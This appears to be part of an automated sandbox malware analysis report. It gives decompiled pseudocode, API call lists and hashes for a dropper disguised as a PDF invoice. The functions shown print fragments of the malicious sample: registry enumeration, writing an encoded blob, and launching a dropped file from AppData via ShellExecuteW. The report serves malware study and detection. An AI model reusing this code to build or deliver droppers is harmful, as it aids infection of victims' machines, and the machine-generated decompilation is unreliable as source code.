                                                                      • Opcode ID: 2181bc46e40e0d50bc866e662c4f5c80ae04519c41e191233be65817b5735372
                                                                      • Instruction ID: bfeac54a7e569f0ef8803044b169413d496b9424a5b862e02772d0402316afe5
                                                                      • Opcode Fuzzy Hash: 2181bc46e40e0d50bc866e662c4f5c80ae04519c41e191233be65817b5735372
                                                                      • Instruction Fuzzy Hash: 5521AE72A44140EBCB20EBD48E8495E77B9EF94318B21457BF502B72D0DBB89851DF2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402511 Relevance: 4.5, APIs: 3, Instructions: 46registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 87%
                                                                      			E00402511(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t8;
				int _t9;
				long _t12;
				int* _t15;
				intOrPtr _t20;
				void* _t21;
				short* _t23;
				void* _t25;
				void* _t28;

				_t23 = __esi;
				_t20 = __edx;
				_t15 = __ebx;
				_t8 = E00402D5D(_t28, 0x20019); // executed
				_t21 = _t8;
				_t9 = E00402C31(3);
				 *((intOrPtr*)(_t25 - 0x50)) = _t20;
				 *__esi = __ebx;
				if(_t21 == __ebx) {
					L7:
					 *((intOrPtr*)(_t25 - 4)) = 1;
				} else {
					 *(_t25 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t25 - 0x18)) == __ebx) {
						_t12 = RegEnumValueW(_t21, _t9, __esi, _t25 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t12;
						if(_t12 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyW(_t21, _t9, __esi, 0x3ff);
						L4:
						_t23[0x3ff] = _t15;
						_push(_t21); // executed
						RegCloseKey(); // executed
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t25 - 4));
				return 0;
			}












                                                                      0x00402511
                                                                      0x00402511
                                                                      0x00402511
                                                                      0x00402516
                                                                      0x0040251d
                                                                      0x0040251f
                                                                      0x00402527
                                                                      0x0040252a
                                                                      0x0040252d
                                                                      0x004028a1
                                                                      0x004028a1
                                                                      0x00402533
                                                                      0x0040253b
                                                                      0x0040253e
                                                                      0x00402557
                                                                      0x0040255d
                                                                      0x0040255f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402540
                                                                      0x00402544
                                                                      0x00402565
                                                                      0x00402565
                                                                      0x0040256c
                                                                      0x0040256d
                                                                      0x0040256d
                                                                      0x0040253e
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                        • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,00000444,00000000,00000022,00000000,?,?), ref: 00402D85
                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402544
                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402557
                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nssE334.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Enum$CloseOpenValue
                                                                      • String ID:
                                                                      • API String ID: 167947723-0
                                                                      • Opcode ID: 406be4fc3511ffa43be0f3a770042bad7dd45ce397e0b432273af2fef54a6be3
                                                                      • Instruction ID: bf3b2bcb6287721b49d379c1e5eb9bed13c1d22dc32754f1d9800637ac4e69b6
                                                                      • Opcode Fuzzy Hash: 406be4fc3511ffa43be0f3a770042bad7dd45ce397e0b432273af2fef54a6be3
                                                                      • Instruction Fuzzy Hash: 44018F71A04204ABE7109FA59E8CABF766CEF40388F10443EF506A61D0EAF84E419629
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401E77 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E00401E77() {
				short* _t6;
				void* _t16;
				void* _t19;
				void* _t26;

				_t24 = E00402C53(_t19);
				_t6 = E00402C53(0x31);
				_t22 = E00402C53(0x22);
				E00402C53(0x15);
				E00401423(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t16 = ShellExecuteW( *(_t26 - 8),  ~( *_t5) & _t24, _t6,  ~( *_t7) & _t22, L"C:\\Users\\Arthur\\AppData\\Local\\Deskriptiv155\\Hjertere",  *(_t26 - 0x1c)); // executed
				if(_t16 < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}







                                                                      0x00401e7f
                                                                      0x00401e81
                                                                      0x00401e91
                                                                      0x00401e93
                                                                      0x00401e9a
                                                                      0x00401ea8
                                                                      0x00401eb8
                                                                      0x00401ec1
                                                                      0x00401eca
                                                                      0x004028a1
                                                                      0x004028a1
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Deskriptiv155\Hjertere,?), ref: 00401EC1
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Deskriptiv155\Hjertere, xrefs: 00401EAA
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: ExecuteShell
                                                                      • String ID: C:\Users\user\AppData\Local\Deskriptiv155\Hjertere
                                                                      • API String ID: 587946157-713220995
                                                                      • Opcode ID: e8ffbd0cb9dd53afc47586dc244d35892eabbe94b946d312e8f435c56cdc8d44
                                                                      • Instruction ID: 3dcdd3b781ba8ea7f848cddc5e889496084bd88ab3ad0d62e4dc7728c2b1bbdb
                                                                      • Opcode Fuzzy Hash: e8ffbd0cb9dd53afc47586dc244d35892eabbe94b946d312e8f435c56cdc8d44
                                                                      • Instruction Fuzzy Hash: 35F0C835704511A7DB107BB5DE4AA9D3264DB40758F208576F901F71D1DAFCC9829628
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405E99 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405E99(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                      0x00405e9d
                                                                      0x00405ead
                                                                      0x00405eb5
                                                                      0x00000000
                                                                      0x00405ebc
                                                                      0x00000000
                                                                      0x00405ebe

                                                                      APIs
                                                                      • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00412A36,B41F94611FD6BF153E261AB07A9ECA49830D57CAEAB658C7B8C11621F8B28D3ED2DCD927DB766B5BAD444660F4D744BAB786B14540EFE1FF57DDE90A2AC5202DC63FBF1CF19E3E6F2193F28AF9138C98045CC9FB43525E48CB5D6C678F4165840A83F9FA91CD0C143005FE65B83B7EA51C683342FC12BB4FCBEA89F113C1691BA405,00403383,B41F94611FD6BF153E261AB07A9ECA49830D57CAEAB658C7B8C11621F8B28D3ED2DCD927DB766B5BAD444660F4D744BAB786B14540EFE1FF57DDE90A2AC5202DC63FBF1CF19E3E6F2193F28AF9138C98045CC9FB43525E48CB5D6C678F4165840A83F9FA91CD0C143005FE65B83B7EA51C683342FC12BB4FCBEA89F113C1691BA405,00412A36,<?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <g fill="#2e3436"> <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.3,00004000,?,00000000,004031AD,00000004), ref: 00405EAD
                                                                      Strings
                                                                      • B41F94611FD6BF153E261AB07A9ECA49830D57CAEAB658C7B8C11621F8B28D3ED2DCD927DB766B5BAD444660F4D744BAB786B14540EFE1FF57DDE90A2AC5202DC63FBF1CF19E3E6F2193F28AF9138C98045CC9FB43525E48CB5D6C678F4165840A83F9FA91CD0C143005FE65B83B7EA51C683342FC12BB4FCBEA89F113C1691BA405, xrefs: 00405E99
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID: B41F94611FD6BF153E261AB07A9ECA49830D57CAEAB658C7B8C11621F8B28D3ED2DCD927DB766B5BAD444660F4D744BAB786B14540EFE1FF57DDE90A2AC5202DC63FBF1CF19E3E6F2193F28AF9138C98045CC9FB43525E48CB5D6C678F4165840A83F9FA91CD0C143005FE65B83B7EA51C683342FC12BB4FCBEA89F113C1691BA405
                                                                      • API String ID: 3934441357-4141620220
                                                                      • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                      • Instruction ID: 98d10028cd881ca52753e47c7ca342dd4640a312c7922d7b1eeb81aac27e7924
                                                                      • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                      • Instruction Fuzzy Hash: 41E0EC3226065AABDF109F55DC00EEB7F6CEB053A1F048836FD55E2190D631EA62DBE4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 16%
                                                                      			E100028A4(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				int _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004050 != 0 && E10002823(_a4) == 0) {
					 *0x10004054 = _t106;
					if( *0x1000404c != 0) {
						_t106 =  *0x1000404c;
					} else {
						E10002DE0(E1000281D(), __ecx);
						 *0x1000404c = _t106;
					}
				}
				_t31 = E1000285F(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E10002853();
					_t81 = _a4;
					_t90 =  *0x10004058;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004058 = _t81;
					E1000284D();
					_t36 = WriteFile(??, ??, ??, ??, ??); // executed
					 *0x10004034 = _t36;
					 *0x10004038 = _t90;
					if( *0x10004050 != 0 && E10002823( *0x10004058) == 0) {
						 *0x1000404c = _t107;
						_t107 =  *0x10004054;
					}
					_t91 =  *0x10004058;
					_a4 = _t91;
					 *0x10004058 =  *((intOrPtr*)(E10002853() + _t91));
					_t40 = E10002831(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E1000285F(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E1000286A() + _a4 + _v8);
							_push(E10002874());
							if( *0x10004050 <= 0 || E10002823(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000404c =  *0x1000404c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004058 == 0) {
						 *0x1000404c = 0;
					}
					_t94 = _a4 + E1000286A();
					 *(E10002878() + _t94) =  *0x10004034;
					 *((intOrPtr*)(E1000287C() + _t94)) =  *0x10004038;
					E1000288C(_a4);
					if(E1000283F() != 0) {
						 *0x10004068 = GetLastError();
					}
					return _a4;
				}
				_push(E1000286A() + _a4);
				_t65 = E10002870();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E1000287C();
				_t100 = E10002878();
				_t103 = E10002874();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}


























                                                                      0x100028b4
                                                                      0x100028c5
                                                                      0x100028d2
                                                                      0x100028e6
                                                                      0x100028d4
                                                                      0x100028d9
                                                                      0x100028de
                                                                      0x100028de
                                                                      0x100028d2
                                                                      0x100028ef
                                                                      0x100028f4
                                                                      0x100028fa
                                                                      0x1000293e
                                                                      0x1000293e
                                                                      0x10002943
                                                                      0x10002948
                                                                      0x1000294e
                                                                      0x10002950
                                                                      0x10002956
                                                                      0x10002963
                                                                      0x10002965
                                                                      0x1000296a
                                                                      0x10002977
                                                                      0x1000298a
                                                                      0x10002990
                                                                      0x10002996
                                                                      0x10002997
                                                                      0x1000299d
                                                                      0x100029a9
                                                                      0x100029af
                                                                      0x100029b7
                                                                      0x100029b8
                                                                      0x100029bb
                                                                      0x100029c6
                                                                      0x100029c8
                                                                      0x100029d4
                                                                      0x100029da
                                                                      0x100029e2
                                                                      0x10002a0e
                                                                      0x10002a0f
                                                                      0x10002a15
                                                                      0x10002a15
                                                                      0x10002a1c
                                                                      0x100029f2
                                                                      0x100029f2
                                                                      0x100029f3
                                                                      0x10002a01
                                                                      0x10002a0a
                                                                      0x10002a0a
                                                                      0x100029e2
                                                                      0x100029c6
                                                                      0x10002a25
                                                                      0x10002a27
                                                                      0x10002a27
                                                                      0x10002a39
                                                                      0x10002a46
                                                                      0x10002a54
                                                                      0x10002a5a
                                                                      0x10002a68
                                                                      0x10002a70
                                                                      0x10002a70
                                                                      0x10002a7e
                                                                      0x10002a7e
                                                                      0x10002905
                                                                      0x10002906
                                                                      0x1000290b
                                                                      0x1000290f
                                                                      0x10002914
                                                                      0x10002928
                                                                      0x10002929
                                                                      0x1000292a
                                                                      0x1000292c
                                                                      0x10002931
                                                                      0x10002933
                                                                      0x10002933
                                                                      0x10002936
                                                                      0x1000293c
                                                                      0x00000000

                                                                      APIs
                                                                      • WriteFile.KERNELBASE(00000000), ref: 10002963
                                                                      • GetLastError.KERNEL32 ref: 10002A6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167633537010.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.167633501084.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633578927.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633608441.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID:
                                                                      • API String ID: 442123175-0
                                                                      • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                      • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                      • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                      • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040249D Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 84%
                                                                      			E0040249D(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402D5D(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C53(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x50) = 0x800;
					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x50) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00406159(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2c8 =  *0x42a2c8 +  *(_t37 - 4);
				return 0;
			}








                                                                      0x0040249d
                                                                      0x0040249d
                                                                      0x004024a2
                                                                      0x004024a9
                                                                      0x004024ab
                                                                      0x004024b2
                                                                      0x004024b5
                                                                      0x004028a1
                                                                      0x004024bb
                                                                      0x004024be
                                                                      0x004024d9
                                                                      0x00402509
                                                                      0x00402509
                                                                      0x0040250c
                                                                      0x004024db
                                                                      0x004024df
                                                                      0x004024f8
                                                                      0x004024ff
                                                                      0x00402502
                                                                      0x004024e1
                                                                      0x004024e4
                                                                      0x004024ef
                                                                      0x00402565
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004024e4
                                                                      0x004024df
                                                                      0x0040256c
                                                                      0x0040256d
                                                                      0x0040256d
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                        • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,00000444,00000000,00000022,00000000,?,?), ref: 00402D85
                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024CE
                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nssE334.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: e6405fb57ab6030a693c3f466e7e59e9f73c5f1728a600693f38ddbb16e9b5d9
                                                                      • Instruction ID: 1238864f951968f7a69ddad796cf6f28c2cd02d7cb81d74efa810d70cc71421c
                                                                      • Opcode Fuzzy Hash: e6405fb57ab6030a693c3f466e7e59e9f73c5f1728a600693f38ddbb16e9b5d9
                                                                      • Instruction Fuzzy Hash: D7115471900205EADB14DFA0CA9C5AE77B4EF04345F21843FE142A72D0D6B88A45DB5D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 69%
                                                                      			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a270;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42922c =  *0x42922c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42922c, 0x7530,  *0x429214), 0); // executed
					}
				}
				return 0;
			}











                                                                      0x0040138a
                                                                      0x004013fa
                                                                      0x0040139b
                                                                      0x004013a0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004013a2
                                                                      0x004013a3
                                                                      0x004013ad
                                                                      0x00000000
                                                                      0x00401404
                                                                      0x004013b0
                                                                      0x004013b7
                                                                      0x004013bd
                                                                      0x004013be
                                                                      0x004013c0
                                                                      0x004013c2
                                                                      0x004013b9
                                                                      0x004013b9
                                                                      0x004013ba
                                                                      0x004013ba
                                                                      0x004013c9
                                                                      0x004013cb
                                                                      0x004013f4
                                                                      0x004013f4
                                                                      0x004013c9
                                                                      0x00000000

                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                                      • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
                                                                      • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                                      • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040238E(void* __ebx) {
				short* _t6;
				long _t8;
				void* _t15;
				long _t19;
				void* _t22;
				void* _t23;

				_t15 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				if( *(_t23 - 0x18) != __ebx) {
					_t6 = E00402C53(0x22);
					_t18 =  *(_t23 - 0x18) & 0x00000002;
					__eflags =  *(_t23 - 0x18) & 0x00000002;
					_t8 = E00402C93(E00402D48( *((intOrPtr*)(_t23 - 0x24))), _t6, _t18); // executed
					_t19 = _t8;
					goto L4;
				} else {
					_t22 = E00402D5D(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t19 = RegDeleteValueW(_t22, E00402C53(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t19 != _t15) {
							goto L6;
						}
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                                      0x0040238e
                                                                      0x0040238e
                                                                      0x00402391
                                                                      0x004023c0
                                                                      0x004023c8
                                                                      0x004023c8
                                                                      0x004023d6
                                                                      0x004023db
                                                                      0x00000000
                                                                      0x00402393
                                                                      0x0040239a
                                                                      0x0040239e
                                                                      0x004028a1
                                                                      0x004028a1
                                                                      0x004023a4
                                                                      0x004023b4
                                                                      0x004023b6
                                                                      0x004023dd
                                                                      0x004023df
                                                                      0x00000000
                                                                      0x004023e5
                                                                      0x004023df
                                                                      0x0040239e
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                        • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,00000444,00000000,00000022,00000000,?,?), ref: 00402D85
